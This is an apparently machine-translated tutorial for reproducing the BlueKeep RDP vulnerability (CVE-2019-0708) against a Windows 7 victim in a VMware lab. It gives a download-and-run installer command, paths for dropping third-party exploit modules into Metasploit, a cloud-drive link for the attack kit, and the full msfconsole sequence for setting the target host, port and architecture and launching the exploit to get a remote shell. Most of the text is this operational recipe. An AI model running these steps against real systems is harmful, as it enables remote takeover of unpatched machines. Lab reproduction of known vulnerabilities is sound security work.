vulnerability environment
Use VMware to install Windows7 SP1 to simulate the victim machine
Use
Preparation of attack tools
- 1. Use the following command to update the installed metasploit framework with one click li>
-
curl https://raw .githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall
- 2. Download the attack kit in the reference and place the file in the corresponding folder of MSF (if a file with the same name already exists, just overwrite it)
-
rdp.rb-> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Attack command
Use msfconsole
to display the framework that enters Metasploit
After the display enters, use reload_all< /code>Reload 0708rdp module and use
Use use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
to enable 0708RDP module Attack
Use info
to view tool related information and settings< /em>
It can be seen that the key settings are mainly RHOSTS
\RPORT
\target
Use< code>set RHOSTS victim machine IPSet victim machine IP
Use set RPORT victim machine PORT
Set the RDP port number of the victim machine
Use set target ID number (optional 0-4)
to set the machine architecture of the victim machine
Here we are using VMware, so goal 2 Meet the conditions
< em id="__mceDel">Use exploit
to start the attack and wait for the connection to be established. After the connection is established, use Get Shell, and then use Get Interactive Shell to complete the attack immediately and successfully get the victim. Host permission
Reference
< h3>Link: https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZgExtraction code: ml9g
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/con fig/templates/metasploit-framework-wrappers/msfupdate.erb> msfinstall && chmod 755 msfinstall && ./msfinstall
rdp.rb-> /opt/metasploit -framework/embedded/framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb